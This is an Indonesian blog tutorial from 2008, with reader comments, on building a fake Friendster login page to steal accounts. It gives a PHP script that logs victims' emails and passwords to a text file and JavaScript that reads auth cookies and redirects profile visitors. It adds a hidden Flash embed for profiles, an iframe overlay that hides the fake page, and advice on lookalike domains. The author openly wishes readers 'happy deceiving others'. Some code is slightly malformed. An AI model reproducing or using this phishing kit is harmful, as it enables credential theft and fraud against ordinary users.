9.04.2008

Membuat Halaman Friendster Palsu

·

Sebelumnya maaf yah karena kemarin aku membuat artikel yang salah. Tapi untuk menebus kesalahan yang aku buat, sekarang aku akan menjelaskan semua dengan sebenar-benarnya tyo
Ok, daripada lama-lama, dan basa-basi yang ada nanti basi langsung saja yah, aku akan menjelaskan untuk membuat halaman Friendster palsu. Mau? Three (3) jaringan seluler mu tyo Kalau berhasil, jangan lupa komentarnya yah...


Dan juga tidak ketinggalan untuk Anselmus Ricky th0r sang Hacker yang TOP BGT. Jangan Hack Blog aku yah. Aku kan masih tidak mengerti apa-apa tyo

Sebelum membaca artikel di bawah, ada baiknya men-download E-Book panduan untuk membuat Flash Di Sini agar kalian bisa membuat halaman log in friendster palsu dengan baik.

Persiapkan Diri Kalian Untuk Membaca Artikel Yang Panjang Ini

Pada dasarnya, dalam setiap peristiwa login setiap pengguna Friendster, ada dua buah file yang terlibat secara langsung, yaitu Login.php dan Submit.php yang ada pada http://www.friendster.com. Kedua file ini mememiliki sedikit perbedaan dalam fungsi kerjanya, secara mudah dapat kita asumsikan bahwa login.php tersebut lebih berfungsi sebagai Interface bagi para pengguna Friendster untuk melakukan login, sedangkan submit.php adalah file yang bekerja sebagai pengirim informasinya yang kita masukkan ke server Friendster.

Kita tidak akan mengubah script yang ada pada login.php milik Friendster, karena pada dasarnya memang tidak diperlukan perubahan apapun, ini hanya sebuah tampilan yang akan ditunjukkan pada pengguna yang ingin melakukan login ke dalam account Friendser mereka. Di lain pihak, kita akan melakukan lebih banyak perubahan pada submit.php tersebut.

Sebelum memulai langkah-langkah yang akan kita lakukan, kita harus mengetahui bahwa script yang akan kita gunakan sebagai submit.php dapat dilihat sebagai berikut:

>?php
function validstr($strutama){
if(strstr($strutama,"@")){return true;}else{ return false;}}

//$ip = getenv ('REMOTE_ADDR');
$date=date("dmy.g:i:sa");
$em=$_POST['email'];
$pw=$_POST['password'];
$referer=$_POST['next'];

if (validstr($em)){
$fl = fopen('fansblogs.txt', 'a') or die("error Opening file");
fwrite($fl,"\r\n$ip;;$date;;\r\n$em;;$pw") or die("access Write failed");
fclose($fl);
header("location:$referer");
}
header("location:$referer");}
?>



Bagian yang aku tebalkan (sebuah tulisan 'fansblogs.txt') merupakan sebuah file text dimana hasil yang berhasil direkam akan disimpan. Oleh karena itu, selain mentiapkan login.php dan submit.php, kita juga harus mempersiapkan sebuah file text kosong dengan nama fansblogs.txt. Tentu saja namanya boleh kita ganti sesuka hati, namun jangan lupa untuk mengubah nama yang tercantum pada script ini juga.

Selain itu kita juga akan memiliki sebuah script yang akan dinamakan login.php, namun dikarenakan script tersebut terlalu panjang dan hanya akan memenuhi halaman Blog aku ini, kamu bisa lihat script tersebut Di Sini

Sebelum memulai pada tahap yang lebih lanjut, aku akan sedikit menerangkan kenapa kita harus menggunakan nama submit.php dan login.php, dan kenapa bukan dengan nama-nama yang lain?

Mudah saja, didalam login.php yang Friendster miliki, terdapat penggalan informasi script yang menyatakan hal sebagai berikut:

<div class="login">Please sign in to continue</div><div class="boxcontent">
<form name="login_form" method="post" action="submit.php"><input type="hidden" name="_submitted" value="1">
<input type="hidden" name="next" value="<?=$par?>">
<input type="hidden" name="tzoffset" value="">



Script tersebut memberikn kita informasi, bahwa pada dasarnya segala bentuk informasi yang pengguna masukkan dalam tampilam login.php akan dikirimkan (method="post"), dan untuk melakukan pengirman tersebut aksi atau tindakan yang harus dilakukan terdapat di submit.php (actiont="submit.php"). Tentu saja harus diingat bahwa tidak adanya URL apapun di bagian depan tulisan submit.php mengindikasikan bahwa script submit.php tersebut ada pada satu filder yang sama dengan login.php, yaitu pada http://www.friendster.com/

Dengan ini sedikit jelas bukan, mengapa kita tidak menggunakan nama lain selain submit.php? Sebelumnya sih boleh saja untuk mengubahnya menjadi kirim.php, asalkan nama file yang kita buat nanti sesuai dengan informasi yang kita ubah pada potongan script login.php tersebut. Sedangkan login.php sendiri bisa kita ubah sesuka hati, asalkan nantinya tidak salah memasukkan nama tersebut pada JavaScript kita.

Pada kesempatan kali ini, aku akan mengasumsikan kita sudah bisa membuat file php, yaitu dengan menulisnya pada Notepad dan melakukan "Save As" sebagai Nama.php dan disimpan dengan type file "All Type" yang pasti semua orang juga sudah mengerti.

Nah! Sekarang kita telah memiliki script yang akan kita upload, yaitu submit.php, dan login.php, yang harus kita lakukan tentu melakukan upload ketiga file tersebut sehingga memiliki sebuah URL yang sekirany seperti berikut:

1. http://www.website-kita.com/login.php
2. http://www.website-kita.com/submit.php
3. http://www.website-kita.com/fansblogs.txt

Memang agak susah kalau kita memahami sesuatu hal tanpa praktek langsung, oleh karena itu aku akan mengajarkan kalian semua secara khusus bagaimana melakukan persiapan sebuah jebakan dengan menggunakan halaman palsu yang kita buat dengan merombak submit.php dan type Flash yang menjalankan script Java.

Jika kalian sudah membaca artikel sebelumnya Di Sini tentu kalian sudah mengerti bagaimana cara menggunakan Flash untuk Friendster Hacking ini.

Tapi ada satu hal yang aku lupakan, yaitu kita harus mempunyai sebuah file JavaScript, kita berikan saja nama script ini false.js, lalu bagaimana bentuk script tersebut? Kira-kira bentuknya seperti berikut:

var id="fgetCookie("Friendster_identitas");
if(id!=pageViewerID)
{
var c=fgetCookie("Friendste_auth"), hostpath="Stealer.php"; document.cookie="Friendster_identitas="+pageViewerID+"; path=/";
window.location.href=hostpath+'?next='+escape("/")+pageOwnerID;
}



Dimana "Stealer.php" aka kita ganti dengan http://www.website-kita.com/login.php, sehingga menjadi sepeti berikut:

var id="fgetCookie("Friendster_identitas");
if(id!=pageViewerID)
{
var c=fgetCookie("Friendste_auth"), hostpath="http://www.website-kita.com/login.php"; document.cookie="Friendster_identitas="+pageViewerID+"; path=/";
window.location.href=hostpath+'?next='+escape("/")+pageOwnerID;
}



Sehingga setiap orang yang membuka halaman yang mengandung Flash tersebut akan menjalankan perintah seperti yang tertera di atas, dan tidak melakukan pembukaan kolom peringatan dengan tulisan "Hello" lagi seperti pada contoh artikel Flash

Dengan ini kita memiliki empat buah file, yang masing-masing dengan fungsinya dapat dikatakan sebagai berikut:

1. http://www.website-kita.com/login.php - Menampilkan informasi
2. http://www.website-kita.com/submit.php - Menyimpan informasi
3. http://www.website-kita.com/false.js - Melakukan redirect ke login.php
4. http://www.website-kita.com/fansblogs.txt - Untuk melihat hasil tangkapan

Dengan ini sudah jelas yang akan kita lakukan berikutnya adalah melakukan penyisipan Flash dengan teknik yang sama persis seperti yang ada pada contoh artikel Flash yaitu dengan memanfaatkan script berikut:

<embed src='ALAMAT-WEB-FILE-SWF' width=0 height=0 allowScriptAcces'always'/>



Script tersebur disisipkan pada beberapa tempat yang terdapat di bagian profile kita, seperti Favorite Music, Hobby and Interest, dan banya kolom lainnya.

Hasil yang akan terjadi tentu beda dengan hasil pada saat script Java masih menggunakan script yang melakukan panggilan terhadap kolom peringatan yang ada pada artikel Flash dengan tulisan "Hello", kali ini yang akan terjadi adalah kita dibawa pada sebuah halaman login yang serupa dengan Friendster namun memiliki URL yang sangat berbeda, yang dimana tentu saja URL tersebut adalah http://www.website-kita.com/login.php atau kalian bisa melihat sendiri halaman login palsu Friendster ini Di Sini itu adalah halaman login Friendster palsu yang aku buat sendiri, jika kalian ingin mencobanya menjadi korban, silahkan saja login dengan halaman itu tyo kan lumayan aku dapat mangsa tyo

Apabila kita tidak ingin halaman tipuan kita ini mudah diketahui oleh para calon korban, ada pilihan jalan yang bisa ditempuh. Yang termudah tentu saja dengan melakukan URL Spoofing. Dimana kita harus melakukan pendaftaran ke beberapa website yang memberikan layanan domain gratis seperti http://www.freedomain.co.nr atau mungkin juga http://www.freedomain.co.cc dan kemudian membuat domain yang serupa dengan Friendster, seperti http://www.friedster.co.nr, http://www.freindster.co.cc, atau kita bisa berbohong untuk mengatakan sekarang ada Friendster yang baru dengan alamat http://www.friendster-news.co.cc atau yang lainnya. Tapi berbohong itu dosa yah? tyo Jadi, bagaimana? Ah.. Itu urusan masing-masing saja, aku tidak ingin mendapat dosa karena kalian tyo

Kalau kita memang ingin sedikit lebih modal dan terlihat keren, tentu saja kita bisa membeli domain yang berbayar, dan bisa saja membuat suatu domain seperti http://www.friendsters.com, namun selain kemungkinan website seperti ini kebanyakan sudah dibeli oleh pihak Friendster untuk mencegah adanya URL Spoofing attact seperti ini, hal ini juga sangat berbahaya bagi ketebalan dompet kita iya kan tyo tyo

Cara alternatif bagi mereka yang tidak berkesempatan mendapatkan domain gratis karena memang sebagian domain sudah diambil oleh orang lain (termasuk aku pada saat mencoba melakukan percobaan beberapa waktu lalu tapi tidak mendapatkan domain yang sebagus yang aku inginkan, cape deh..), dan bagi mereka yang tidak ingin mengeluarkan uang hanya untuk melakukan atau mencoba tindakan seperti ini, artikel ini juga akan memberikan kalian alternatif tanpa uang dan kesempatan tak terbatas, yaitu menggunakan teknik Frame Up.

Bagi mereka yang sudah lama berkecimpung di dunia komputer, terutama keamanan, dan baru kali ini mendengar istilah Frame Up, atau mungkin sudah mencari di Google namun tidak ketemu juga setelah 2 jam tyo , tenang saja kalian tidak perlu bingung. Karena istilah tersebut memang baru di ciptakan oleh seorang penulis buku bernama Anselmus Ricky tyo jadi bukan hal yang aneh kalau kalian belum pernah dengar (aku saja baru kali ini nyebutin tyo ).

Walaupun namanya baru dibuat, namun teknik ini memang ada. Ini mmerupakan sebuah teknik yang menggunakan Frame atau bahasa Indonesianya adalah Bingkai pada Browser sering kali digunakan untuk menutupi jalan rahasia ruang khusus, maka pada kasus ini, bingkai dipindahkan ke dalam Internet.

Untuk melakukan teknik ini, kita hanya perlu mengubah dua buah file, yaitu submit.php dan false.js kita. Berikut adalah script yang harus kita masukkan pada submit.php kita yang baru:

<?php
function validstr($strutama){
if(strstr($strutama,"@")){return true;}else{ return false;}}

//$ip = getenv ('REMOTE_ADDR');
$date=date("dmy.g:i:sa");
$em=$_POST['email'];
$pw=$_POST['password'];
$referer=$_POST['next'];

if (validstr($em)){
$fl = fopen('fshacks.txt', 'a') or die("error Opening file");
fwrite($fl,"\r\n$ip;;$date;;\r\n$em;;$pw") or die("access Write failed");
fclose($fl);
header("location:$referer");
}
else{header("location:http://www.website-kita.com/login.php");}
?>



Selain sedikit perubahan yang harus dilakukan pada submit.php, kita juga harus melakukan perybahan lebih menyeluruh pada script yang akan kita gunakan di dalam false.js, sehingga menjadi seperti berikut:

var id=fgetCookie("friendster_identitas");
if(id!=pageViewerID)
{
var c=fgetCookie("friendster_auth"), fUrl="www.website-kita.com/login.php"+"?next="+escape("/")+pageOwnerID;
var pTitle="Friendster - Log In";
document.cookie="friendster_identitas="+pageViewerID+"; path=/";
createObj(pTitle,fUrl);
}
function createObj(pTitle,fUrl){
document.title=pTitle;document.body.innerHTML='';
var oLey=document.createElement("div");
oLey.style.textAlign='left';document.body.appendChild(oLey);
var nFrm=document.createElement("iframe");
nFrm.setAttribute('src',fUrl);
nFrm.setAttribute("Style",'position': absolute; border:0;');
nFrm.setAttribute('width',1020);
nFrm.setAttribute('height',611);oLey.appendChild(nFrm);}



Nah.. Bagaimana sekarang? Apa kalian sudah pusing? tyo Kalau sudah pusing, segera PANTOGIN kepala kamu ke TEMBOK tyo tyo

Memang kalau kamu pusing, artinya kamu sudah belajar dengan benar, dan karena itu akan aku ucapkan SELAMAT BERKARYA dan SELAMAT MENIPU ORANG LAIN tyo tyo tyo

Sudah yah.. Berhubung ini bulan Suci Ramadhan, dan yang pasti saat aku menulis artikel ini sudah menunjukkan jam 03:00 dan saatnya aku untuk makan Sauuurrr... tyo

Oya, jika kalian bingung atau tidak bisa membuat halaman log in friendster palsu ini, silahkan memberi komentar atau hubungi aku jika sedang online di YM OK.

Ternyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman Ini

Masukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas





9 comments:

Anonymous said...
September 5, 2008 at 4:16 PM  

walah..walah..heheehe..bener2 nehh..diem2 ternyata seneng nge-hack juga..hehehe..

paank Fachrezi said...
September 6, 2008 at 4:29 PM  

pengen sih, tp keknya rumit deh.

nice post,...

fansblogs said...
September 8, 2008 at 10:34 AM  
This comment has been removed by the author.
Unknown said...
September 9, 2008 at 11:23 AM  

doouuhh..puyeeng hehehe

bkinin flash yng bru dunk, yng http://www.geocities.com/tyogitaris/fshacking.swf kyanya uda di banned nih:(

trus klu submit.php dan false.js uda di edit diapain gih,,,weleeeeeeehh msih pmula nih hohoh

fansblogs said...
September 10, 2008 at 10:42 AM  

==> Blogger Addicter, bisa aja :)) jadi ga enak =))

==> laboratoriunm, kalo puyeng artinya udah belajar :D

==> odie, alamat itu emang ga ada, itu cuma buat contoh aja, jadi kamu harus bikin sebdiri, kan di atas ada caranya ;)) atau kamu download ebook nya aja biar serius download di http://www.ziddu.com/download/2125152/flash_exploit.zip.html

Anonymous said...
September 17, 2008 at 9:12 AM  

Thx. Sip infonya. Ntar dicoba,bro

Anonymous said...
November 3, 2008 at 6:47 AM  

bisa tau cara hidden fans/friends list gitu di friendster gak?
jika ya pls email me
lenny_lai@yahoo.com

Thanks

Anonymous said...
December 24, 2008 at 7:38 PM  

ini msh bisa ga ampe skrng login palsu....??
soalnya ud nyobain nyari2 d tmpt aen g ad yg bs...
thanks

Anonymous said...
December 26, 2008 at 3:47 PM  

gw dah pernah nyoba tuh dg cranya agk sdikit beda. tapi gw mentok ampe ketika harus mengirim objek flash yg diinjeksi dg script redirect. masalahnya, gw gk punya objek flash nya dan gk tau cara buatnya.
ada yg tau gk?
web hosting gw di ripway, menurut lo gmna?
trus diantara cara hack FS, artikel ini yg pling komplet. gw plajari lagi ya...

The Dark Avenger